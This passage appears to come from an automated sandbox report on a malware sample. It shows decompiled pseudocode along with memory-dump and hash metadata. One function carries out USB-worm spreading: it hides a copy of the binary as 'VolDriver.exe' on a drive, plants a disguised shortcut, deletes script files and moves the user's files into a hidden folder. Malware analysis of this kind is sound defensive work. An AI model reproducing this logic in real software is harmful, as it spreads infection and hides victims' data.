                                                                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                                                                    				void* _t77;
                                                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                                                    				void* _t79;
                                                                                                                                                                                                                                                                                    				intOrPtr _t86;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t30 =  *0x417634; // 0x1
                                                                                                                                                                                                                                                                                    				if((_t30 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                    					_t63 =  *0x417634; // 0x1
                                                                                                                                                                                                                                                                                    					 *0x417634 = _t63 | 0x00000001;
                                                                                                                                                                                                                                                                                    					_t47 = E00408B00(0xffffe4); // executed
                                                                                                                                                                                                                                                                                    					_t78 = _t78 + 4;
                                                                                                                                                                                                                                                                                    					 *0x417630 = _t47;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t65 =  *0x417630; // 0x4660028
                                                                                                                                                                                                                                                                                    				memset(_t65, 0, 0xffffe4);
                                                                                                                                                                                                                                                                                    				_t79 = _t78 + 0xc;
                                                                                                                                                                                                                                                                                    				_t33 =  *0x417630; // 0x4660028
                                                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t33 + 0xc)) = 1;
                                                                                                                                                                                                                                                                                    				_t48 =  *0x417630; // 0x4660028
                                                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t48 + 0x10)) = _a12;
                                                                                                                                                                                                                                                                                    				_t34 =  *0x417630; // 0x4660028
                                                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t34 + 8)) = _a16;
                                                                                                                                                                                                                                                                                    				_t67 =  *0x417630; // 0x4660028
                                                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t67 + 0x18)) = _a20;
                                                                                                                                                                                                                                                                                    				_t50 =  *0x417630; // 0x4660028
                                                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t50 + 0x14)) = 0xc;
                                                                                                                                                                                                                                                                                    				if(_a12 == 0) {
                                                                                                                                                                                                                                                                                    					_t69 =  *0x417630; // 0x4660028
                                                                                                                                                                                                                                                                                    					_v8 = _t69 + 0x20;
                                                                                                                                                                                                                                                                                    					if(_a24 == 0) {
                                                                                                                                                                                                                                                                                    						_t42 =  *0x417630; // 0x4660028
                                                                                                                                                                                                                                                                                    						_t44 = E00409820(_a8, _t42 + 0x20);
                                                                                                                                                                                                                                                                                    						_t79 = _t79 + 8;
                                                                                                                                                                                                                                                                                    						_t76 =  *0x417630; // 0x4660028
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t76 + 0x1c)) = _t44;
                                                                                                                                                                                                                                                                                    						_t45 =  *0x417630; // 0x4660028
                                                                                                                                                                                                                                                                                    						_t77 =  *0x417630; // 0x4660028
                                                                                                                                                                                                                                                                                    						_t46 =  *0x417630; // 0x4660028
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t46 + 0x14)) =  *(_t45 + 0x1c) * 0xc +  *((intOrPtr*)(_t77 + 0x14));
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t53 =  *0x417630; // 0x4660028
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t53 + 0x1c) * 0xc + _v8;
                                                                                                                                                                                                                                                                                    					_v12 = _v8;
                                                                                                                                                                                                                                                                                    					_t39 = E00404720( &(_v12[1]), 0xffff);
                                                                                                                                                                                                                                                                                    					_t79 = _t79 + 8;
                                                                                                                                                                                                                                                                                    					 *_v12 = _t39;
                                                                                                                                                                                                                                                                                    					_t75 =  *0x417630; // 0x4660028
                                                                                                                                                                                                                                                                                    					_t58 = ( *_v12 << 8) +  *((intOrPtr*)(_t75 + 0x14));
                                                                                                                                                                                                                                                                                    					_t86 = _t58;
                                                                                                                                                                                                                                                                                    					_t41 =  *0x417630; // 0x4660028
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t41 + 0x14)) = _t58;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t36 =  *0x417630; // 0x4660028
                                                                                                                                                                                                                                                                                    				_t37 = E00409EC0(_a4, _t86, _a4, _t36, _a28, _a32); // executed
                                                                                                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                                                                                                    			}































                                                                                                                                                                                                                                                                                    0x00409f66
                                                                                                                                                                                                                                                                                    0x00409f6e
                                                                                                                                                                                                                                                                                    0x00409f70
                                                                                                                                                                                                                                                                                    0x00409f79
                                                                                                                                                                                                                                                                                    0x00409f84
                                                                                                                                                                                                                                                                                    0x00409f89
                                                                                                                                                                                                                                                                                    0x00409f8c
                                                                                                                                                                                                                                                                                    0x00409f8c
                                                                                                                                                                                                                                                                                    0x00409f98
                                                                                                                                                                                                                                                                                    0x00409f9f
                                                                                                                                                                                                                                                                                    0x00409fa4
                                                                                                                                                                                                                                                                                    0x00409fa7
                                                                                                                                                                                                                                                                                    0x00409fac
                                                                                                                                                                                                                                                                                    0x00409fb3
                                                                                                                                                                                                                                                                                    0x00409fbc
                                                                                                                                                                                                                                                                                    0x00409fbf
                                                                                                                                                                                                                                                                                    0x00409fc7
                                                                                                                                                                                                                                                                                    0x00409fca
                                                                                                                                                                                                                                                                                    0x00409fd3
                                                                                                                                                                                                                                                                                    0x00409fd6
                                                                                                                                                                                                                                                                                    0x00409fdc
                                                                                                                                                                                                                                                                                    0x00409fe7
                                                                                                                                                                                                                                                                                    0x00409fed
                                                                                                                                                                                                                                                                                    0x00409ff6
                                                                                                                                                                                                                                                                                    0x00409ffd
                                                                                                                                                                                                                                                                                    0x00409fff
                                                                                                                                                                                                                                                                                    0x0040a00c
                                                                                                                                                                                                                                                                                    0x0040a011
                                                                                                                                                                                                                                                                                    0x0040a014
                                                                                                                                                                                                                                                                                    0x0040a01a
                                                                                                                                                                                                                                                                                    0x0040a01d
                                                                                                                                                                                                                                                                                    0x0040a028
                                                                                                                                                                                                                                                                                    0x0040a031
                                                                                                                                                                                                                                                                                    0x0040a036
                                                                                                                                                                                                                                                                                    0x0040a036
                                                                                                                                                                                                                                                                                    0x0040a039
                                                                                                                                                                                                                                                                                    0x0040a048
                                                                                                                                                                                                                                                                                    0x0040a04e
                                                                                                                                                                                                                                                                                    0x0040a05d
                                                                                                                                                                                                                                                                                    0x0040a062
                                                                                                                                                                                                                                                                                    0x0040a068
                                                                                                                                                                                                                                                                                    0x0040a072
                                                                                                                                                                                                                                                                                    0x0040a078
                                                                                                                                                                                                                                                                                    0x0040a078
                                                                                                                                                                                                                                                                                    0x0040a07b
                                                                                                                                                                                                                                                                                    0x0040a080
                                                                                                                                                                                                                                                                                    0x0040a080
                                                                                                                                                                                                                                                                                    0x0040a08b
                                                                                                                                                                                                                                                                                    0x0040a095
                                                                                                                                                                                                                                                                                    0x0040a0a0

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ceb0b3363d9c775dd2098eafacf6576df0e8b3955d382d3e647a225eb53606a2
                                                                                                                                                                                                                                                                                    • Instruction ID: e425cd8e01b108ff0861438508daeb1939ae9ade08a4d14ec08a2a63a7bd6065
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ceb0b3363d9c775dd2098eafacf6576df0e8b3955d382d3e647a225eb53606a2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D412CB5A15604DFC708CF08EA91EAA77B2FB88314F10817DE8095B391D734E956CBD9
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                    			E00408620(void* _a4, void* _a8) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_a4 + 0x10c)) != 0) {
                                                                                                                                                                                                                                                                                    						if( *(_a4 + 0x120) != 1) {
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)(_a4 + 0x174)) != 1) {
                                                                                                                                                                                                                                                                                    								_v8 = 1;
                                                                                                                                                                                                                                                                                    								while(_v8 <=  *((intOrPtr*)(_a4 + 0x174))) {
                                                                                                                                                                                                                                                                                    									if( *((intOrPtr*)(_a4 + 0x3b78 + _v8 * 4)) <= 0) {
                                                                                                                                                                                                                                                                                    										_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								L14:
                                                                                                                                                                                                                                                                                    								_t36 = E00407F90(_a4, _v8, 1); // executed
                                                                                                                                                                                                                                                                                    								_t69 = _t68 + 0xc;
                                                                                                                                                                                                                                                                                    								_v12 = _t36;
                                                                                                                                                                                                                                                                                    								if(_v12 == 0) {
                                                                                                                                                                                                                                                                                    									E00407A40(_a4 + 8, _a4 + 8, 0x10);
                                                                                                                                                                                                                                                                                    									_t66 = _a4;
                                                                                                                                                                                                                                                                                    									E00408510(_a4, _a4);
                                                                                                                                                                                                                                                                                    									_t71 = _t69 + 0xc;
                                                                                                                                                                                                                                                                                    									if(_a8 != 0) {
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										_t66 = _a8;
                                                                                                                                                                                                                                                                                    										memcpy(_a8, _a4 + 8,  *_a4 + 7 + (_a8 & 0x00000007) >> 3);
                                                                                                                                                                                                                                                                                    										_t71 = _t71 + 0xc;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									E00408460(_t66, _a4);
                                                                                                                                                                                                                                                                                    									 *(_a4 + 0x120) = 1;
                                                                                                                                                                                                                                                                                    									return 0;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								return _v12;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_v8 = 1;
                                                                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return 5;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return 3;
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    0x0040862a
                                                                                                                                                                                                                                                                                    0x00408640
                                                                                                                                                                                                                                                                                    0x00408656
                                                                                                                                                                                                                                                                                    0x00408669
                                                                                                                                                                                                                                                                                    0x00408674
                                                                                                                                                                                                                                                                                    0x00408686
                                                                                                                                                                                                                                                                                    0x004086a2
                                                                                                                                                                                                                                                                                    0x00408683
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00408683
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004086a4
                                                                                                                                                                                                                                                                                    0x004086a8
                                                                                                                                                                                                                                                                                    0x004086b2
                                                                                                                                                                                                                                                                                    0x004086b7
                                                                                                                                                                                                                                                                                    0x004086ba
                                                                                                                                                                                                                                                                                    0x004086c1
                                                                                                                                                                                                                                                                                    0x004086d1
                                                                                                                                                                                                                                                                                    0x004086d9
                                                                                                                                                                                                                                                                                    0x004086dd
                                                                                                                                                                                                                                                                                    0x004086e2
                                                                                                                                                                                                                                                                                    0x004086e9
                                                                                                                                                                                                                                                                                    0x004086f3
                                                                                                                                                                                                                                                                                    0x00408704
                                                                                                                                                                                                                                                                                    0x00408708
                                                                                                                                                                                                                                                                                    0x0040870d
                                                                                                                                                                                                                                                                                    0x0040870d
                                                                                                                                                                                                                                                                                    0x00408714
                                                                                                                                                                                                                                                                                    0x0040871f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00408729
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004086c3
                                                                                                                                                                                                                                                                                    0x0040866b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040866b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00408658
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00408642
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 7660fb0b8a2853db22bf974449fae69c1642a48b9da066cf7d9c0f2c50659128
                                                                                                                                                                                                                                                                                    • Instruction ID: 292dd43053ad6225b6992450cf0b05fd0c33cfe4ee31c93501746e46cd6df3e6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7660fb0b8a2853db22bf974449fae69c1642a48b9da066cf7d9c0f2c50659128
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88318174900108EBCB00DF54CA45BAD37B1AB54348F24857EE9496F3C1DB7AEA91DB8A
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00404FC0(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16) {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				short _v1044;
                                                                                                                                                                                                                                                                                    				short _v1564;
                                                                                                                                                                                                                                                                                    				short _v2084;
                                                                                                                                                                                                                                                                                    				intOrPtr _v2088;
                                                                                                                                                                                                                                                                                    				short _v2612;
                                                                                                                                                                                                                                                                                    				short _v3132;
                                                                                                                                                                                                                                                                                    				char _v3133;
                                                                                                                                                                                                                                                                                    				struct _WIN32_FIND_DATAW _v3732;
                                                                                                                                                                                                                                                                                    				short _v4252;
                                                                                                                                                                                                                                                                                    				void* _v4256;
                                                                                                                                                                                                                                                                                    				short _v4780;
                                                                                                                                                                                                                                                                                    				intOrPtr _v4784;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4788;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4792;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4796;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4800;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4804;
                                                                                                                                                                                                                                                                                    				intOrPtr _v4808;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4812;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4816;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4820;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4824;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4828;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4832;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4836;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4840;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4844;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4848;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4852;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4856;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4860;
                                                                                                                                                                                                                                                                                    				signed char _v4861;
                                                                                                                                                                                                                                                                                    				signed char _v4862;
                                                                                                                                                                                                                                                                                    				signed int _v4868;
                                                                                                                                                                                                                                                                                    				signed int _v4872;
                                                                                                                                                                                                                                                                                    				intOrPtr _t167;
                                                                                                                                                                                                                                                                                    				intOrPtr _t195;
                                                                                                                                                                                                                                                                                    				void* _t218;
                                                                                                                                                                                                                                                                                    				void* _t219;
                                                                                                                                                                                                                                                                                    				void* _t224;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0040EE0A();
                                                                                                                                                                                                                                                                                    				if((_a12 & 0x00080000) != 0) {
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v2088 = 0x415124;
                                                                                                                                                                                                                                                                                    				_v3133 = 0;
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1564, L"%s.lnk", _a8);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v4252, L"%s\\%s", _a4, _v2088);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v4780, L"%s\\%s\\VolDriver.exe", _a4, _v2088);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v2612, L"%s\\%s", _a4,  &_v1564);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1044, L"%s\\*", _a4);
                                                                                                                                                                                                                                                                                    				_t224 = _t219 + 0x48;
                                                                                                                                                                                                                                                                                    				if(PathFileExistsW( &_v4780) != 0) {
                                                                                                                                                                                                                                                                                    					_t167 = E0040D180( &_v4780);
                                                                                                                                                                                                                                                                                    					_t224 = _t224 + 4;
                                                                                                                                                                                                                                                                                    					_v4784 = _t167;
                                                                                                                                                                                                                                                                                    					_t195 =  *0x4163b8; // 0x13c00
                                                                                                                                                                                                                                                                                    					if(_t195 != _v4784) {
                                                                                                                                                                                                                                                                                    						SetFileAttributesW( &_v4780, 0x80);
                                                                                                                                                                                                                                                                                    						DeleteFileW( &_v4780);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(PathFileExistsW( &_v4780) == 0) {
                                                                                                                                                                                                                                                                                    					if(PathFileExistsW( &_v4252) == 0 && CreateDirectoryW( &_v4252, 0) != 0) {
                                                                                                                                                                                                                                                                                    						SetFileAttributesW( &_v4252, 2);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(PathFileExistsW( &_v4252) != 0 && CopyFileW(0x4163c0,  &_v4780, 0) != 0) {
                                                                                                                                                                                                                                                                                    						SetFileAttributesW( &_v4780, 2);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(PathFileExistsW( &_v2612) == 0) {
                                                                                                                                                                                                                                                                                    					if((_a16 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    						E00404D70( &_v2612, L"shell32.dll", 8);
                                                                                                                                                                                                                                                                                    						_t224 = _t224 + 0xc;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						E00404D70( &_v2612, L"shell32.dll", 9);
                                                                                                                                                                                                                                                                                    						_t224 = _t224 + 0xc;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					SetFileAttributesW( &_v2612, 1);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v4256 = FindFirstFileW( &_v1044,  &_v3732);
                                                                                                                                                                                                                                                                                    				if(_v4256 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    					L45:
                                                                                                                                                                                                                                                                                    					return _v3133;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_v4860 = L"*.lnk";
                                                                                                                                                                                                                                                                                    					_v4856 = L"*.vbs";
                                                                                                                                                                                                                                                                                    					_v4852 = L"*.js";
                                                                                                                                                                                                                                                                                    					_v4848 = L"*.scr";
                                                                                                                                                                                                                                                                                    					_v4844 = L"*.com";
                                                                                                                                                                                                                                                                                    					_v4840 = L"*.jse";
                                                                                                                                                                                                                                                                                    					_v4836 = L"*.cmd";
                                                                                                                                                                                                                                                                                    					_v4832 = L"*.pif";
                                                                                                                                                                                                                                                                                    					_v4828 = L"*.jar";
                                                                                                                                                                                                                                                                                    					_v4824 = L"*.dll";
                                                                                                                                                                                                                                                                                    					_v4820 = L"*.vbe";
                                                                                                                                                                                                                                                                                    					_v4816 = L"*.bat";
                                                                                                                                                                                                                                                                                    					_v4812 = L"*.inf";
                                                                                                                                                                                                                                                                                    					_v4808 = _v2088;
                                                                                                                                                                                                                                                                                    					_v4804 =  &_v1564;
                                                                                                                                                                                                                                                                                    					_v4800 = L"Thumbs.db";
                                                                                                                                                                                                                                                                                    					_v4796 = L"$RECYCLE.BIN";
                                                                                                                                                                                                                                                                                    					_v4792 = L"desktop.ini";
                                                                                                                                                                                                                                                                                    					_v4788 = L"System Volume Information";
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						if(lstrcmpW( &(_v3732.cFileName), ".") != 0 && lstrcmpW( &(_v3732.cFileName), L"..") != 0) {
                                                                                                                                                                                                                                                                                    							_v4862 = 0;
                                                                                                                                                                                                                                                                                    							_v4868 = 0;
                                                                                                                                                                                                                                                                                    							while(_v4868 < 6) {
                                                                                                                                                                                                                                                                                    								if(lstrcmpiW( &(_v3732.cFileName),  *(_t218 + _v4868 * 4 - 0x12c4)) == 0) {
                                                                                                                                                                                                                                                                                    									_v4862 = 1;
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_v4868 = _v4868 + 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if((_v4862 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    								_v4861 = 0;
                                                                                                                                                                                                                                                                                    								_v4872 = 0;
                                                                                                                                                                                                                                                                                    								while(_v4872 < 0xd) {
                                                                                                                                                                                                                                                                                    									if(PathMatchSpecW( &(_v3732.cFileName),  *(_t218 + _v4872 * 4 - 0x12f8)) != 0) {
                                                                                                                                                                                                                                                                                    										wsprintfW( &_v2084, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                                    										_t224 = _t224 + 0x10;
                                                                                                                                                                                                                                                                                    										SetFileAttributesW( &_v2084, 0x80);
                                                                                                                                                                                                                                                                                    										DeleteFileW( &_v2084);
                                                                                                                                                                                                                                                                                    										_v4861 = 1;
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_v4872 = _v4872 + 1;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								if((_v4861 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    									if(PathFileExistsW( &_v4252) != 0) {
                                                                                                                                                                                                                                                                                    										wsprintfW( &_v3132, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                                    										wsprintfW( &_v524, L"%s\\%s\\%s", _a4, _v2088,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                                    										_t224 = _t224 + 0x24;
                                                                                                                                                                                                                                                                                    										if((_v3732.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                    											MoveFileExW( &_v3132,  &_v524, 9);
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											E00404E80( &_v3132,  &_v524);
                                                                                                                                                                                                                                                                                    											_t224 = _t224 + 8;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								goto L43;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L43:
                                                                                                                                                                                                                                                                                    					} while (FindNextFileW(_v4256,  &_v3732) != 0);
                                                                                                                                                                                                                                                                                    					FindClose(_v4256);
                                                                                                                                                                                                                                                                                    					goto L45;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}












































                                                                                                                                                                                                                                                                                    0x00404fc8
                                                                                                                                                                                                                                                                                    0x00404fd5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404fd7
                                                                                                                                                                                                                                                                                    0x00404fde
                                                                                                                                                                                                                                                                                    0x00404fe8
                                                                                                                                                                                                                                                                                    0x00404fff
                                                                                                                                                                                                                                                                                    0x0040501f
                                                                                                                                                                                                                                                                                    0x0040503f
                                                                                                                                                                                                                                                                                    0x0040505f
                                                                                                                                                                                                                                                                                    0x00405078
                                                                                                                                                                                                                                                                                    0x0040507e
                                                                                                                                                                                                                                                                                    0x00405090
                                                                                                                                                                                                                                                                                    0x00405099
                                                                                                                                                                                                                                                                                    0x0040509e
                                                                                                                                                                                                                                                                                    0x004050a1
                                                                                                                                                                                                                                                                                    0x004050a7
                                                                                                                                                                                                                                                                                    0x004050b3
                                                                                                                                                                                                                                                                                    0x004050c1
                                                                                                                                                                                                                                                                                    0x004050ce
                                                                                                                                                                                                                                                                                    0x004050ce
                                                                                                                                                                                                                                                                                    0x004050b3
                                                                                                                                                                                                                                                                                    0x004050e3
                                                                                                                                                                                                                                                                                    0x004050f4
                                                                                                                                                                                                                                                                                    0x00405112
                                                                                                                                                                                                                                                                                    0x00405112
                                                                                                                                                                                                                                                                                    0x00405127
                                                                                                                                                                                                                                                                                    0x0040514a
                                                                                                                                                                                                                                                                                    0x0040514a
                                                                                                                                                                                                                                                                                    0x00405127
                                                                                                                                                                                                                                                                                    0x0040515f
                                                                                                                                                                                                                                                                                    0x00405167
                                                                                                                                                                                                                                                                                    0x0040518f
                                                                                                                                                                                                                                                                                    0x00405194
                                                                                                                                                                                                                                                                                    0x00405169
                                                                                                                                                                                                                                                                                    0x00405177
                                                                                                                                                                                                                                                                                    0x0040517c
                                                                                                                                                                                                                                                                                    0x0040517c
                                                                                                                                                                                                                                                                                    0x004051a0
                                                                                                                                                                                                                                                                                    0x004051a0
                                                                                                                                                                                                                                                                                    0x004051ba
                                                                                                                                                                                                                                                                                    0x004051c7
                                                                                                                                                                                                                                                                                    0x0040548f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004051cd
                                                                                                                                                                                                                                                                                    0x004051cd
                                                                                                                                                                                                                                                                                    0x004051d7
                                                                                                                                                                                                                                                                                    0x004051e1
                                                                                                                                                                                                                                                                                    0x004051eb
                                                                                                                                                                                                                                                                                    0x004051f5
                                                                                                                                                                                                                                                                                    0x004051ff
                                                                                                                                                                                                                                                                                    0x00405209
                                                                                                                                                                                                                                                                                    0x00405213
                                                                                                                                                                                                                                                                                    0x0040521d
                                                                                                                                                                                                                                                                                    0x00405227
                                                                                                                                                                                                                                                                                    0x00405231
                                                                                                                                                                                                                                                                                    0x0040523b
                                                                                                                                                                                                                                                                                    0x00405245
                                                                                                                                                                                                                                                                                    0x00405255
                                                                                                                                                                                                                                                                                    0x00405261
                                                                                                                                                                                                                                                                                    0x00405267
                                                                                                                                                                                                                                                                                    0x00405271
                                                                                                                                                                                                                                                                                    0x0040527b
                                                                                                                                                                                                                                                                                    0x00405285
                                                                                                                                                                                                                                                                                    0x0040528f
                                                                                                                                                                                                                                                                                    0x004052a3
                                                                                                                                                                                                                                                                                    0x004052c0
                                                                                                                                                                                                                                                                                    0x004052c7
                                                                                                                                                                                                                                                                                    0x004052e2
                                                                                                                                                                                                                                                                                    0x00405308
                                                                                                                                                                                                                                                                                    0x0040530c
